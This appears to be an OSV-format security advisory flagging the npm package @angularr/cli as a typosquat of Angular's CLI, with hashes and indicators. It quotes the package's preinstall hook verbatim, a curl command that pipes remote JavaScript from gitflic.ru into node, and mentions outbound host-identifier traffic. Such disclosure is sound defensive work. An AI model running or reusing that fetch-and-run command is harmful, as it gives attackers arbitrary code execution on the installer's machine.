{"id":"MAL-2026-17492","summary":"Malicious code in @angularr/cli (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (122d8c8fdbfe9bd590dd3e1c41a6afcefff4f1c552af5f1756577975c84878a8)\nPackage is published as @angularr/cli (double 'r') and copies @angular/cli's description, keywords, homepage, repository URL, README, and version string (22.2.1) to impersonate Angular's official CLI. package.json declares a preinstall lifecycle hook that pipes a remote JavaScript file into node: `curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node`. The fetched script is hosted on gitflic.ru (user 'hellscripter', unrelated to Angular's publisher), proxied through web.archive.org, is unpinned, has no integrity check, and is executed directly by the installer's node process. Any `npm install @angularr/cli` performs arbitrary code execution on the installer's host under the account running npm. src/analytics/analytics-collector.js additionally issues outbound ping/POST traffic via https.request carrying host identifiers.\n","modified":"2026-10-04T23:45:18.012911604Z","published":"2026-10-04T23:17:38Z","database_specific":{"malicious-packages-origins":[{"id":"IN-MAL-2026-020906","import_time":"2026-10-04T23:40:40.629757118Z","modified_time":"2026-10-04T23:17:38Z","sha256":"122d8c8fdbfe9bd590dd3e1c41a6afcefff4f1c552af5f1756577975c84878a8","source":"amazon-inspector","versions":["22.2.1"]}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/@angularr/cli/v/22.2.1"}],"affected":[{"package":{"name":"@angularr/cli","ecosystem":"npm","purl":"pkg:npm/%40angularr/cli"},"versions":["22.2.1"],"database_specific":{"cwes":[{"description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code","cweId":"CWE-506"}],"indicators":{"package_integrity":[{"hashes":{"sha1":"94202cdd816372a4adc8fcc2ddd9927dcff0419e","sha512_sri":"sha512-aJaBpCe9lyh6F8tsoVtJoKH6/D18aL6tGzQ/OMROYu6NTtcDA+u/WNxoFVyONE3Tt3uXjf9cTcG/l+iGvLx9Ig=="},"filename":"cli-22.2.1.tgz"}],"evidence_files":[{"sha256":"eb95ee065027d871536fb430be906c3856e640190f36dab01b93d64a1af758e5","tlsh":"0f313576dae01d6316d9128598360903b43c962f0e06fa78f799540c4f8f69f2277aae","path":"package.json"}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@angularr/cli/MAL-2026-17492.json"}}],"schema_version":"1.9.0","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}